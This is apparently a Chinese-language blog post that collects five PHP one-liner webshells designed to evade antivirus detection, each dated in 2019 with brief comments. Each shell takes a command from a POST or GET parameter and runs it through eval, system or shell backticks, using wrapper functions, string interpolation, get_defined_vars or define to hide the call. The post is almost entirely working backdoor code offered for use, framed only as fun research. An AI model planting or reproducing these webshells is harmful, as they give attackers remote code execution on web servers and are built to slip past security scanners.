简介

开一篇文章,准备持续记录一下自己发现的一些有趣的免杀一句话。这里记录一下自己的一些骚姿势(勉强算骚吧)。

注:截图以GET方式为例。

shell01

Time: 2019-08-14

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
<?php

function s1ye($a)
{
	if($a==='s1ye')
	{
		return $_POST['cmd'];
	}
	return $a;

}

s1ye(eval(s1ye('s1ye')));

shell02

Time: 2019-08-15

1
2
3
4
<?php

$a = $_POST['cmd'];
$var = "phpnb {${eval($a)}}";

shell03

Time: 2019-08-16

这个shell注意一下,默认shellexec是被禁用的,不过phpstudy倒是没禁用(测的时候也没注意,感谢后面Y4er臭弟弟提醒)

1
2
3
4
<?php

$a = $_POST[cmd];
echo `php -r "echo \`{$a}\`;"`;

shell04

Time: 2019-08-25

描述: 真·一句话木马(更:完全可以去掉前面的字符串 - -。)

1
2
<?php
@eval("echo 'Powered by s1ye</br>';".get_defined_vars()['_GET']['cmd']);

shell05

Time: 2019-10-16

描述: 利用了php的内置函数可以动态拼接的特性,类似于重构了函数。(什么鬼,还没有上一个简单)

1
2
3
4
5
<?php

define("ARRAY","eval");

@ARRAY(system(get_defined_vars()[_GET]['a']));

写在后面的话

仅作有趣的姿势研究,并且不固定更新,偶尔有好的想法了会来更新,欢迎看到的师傅指点~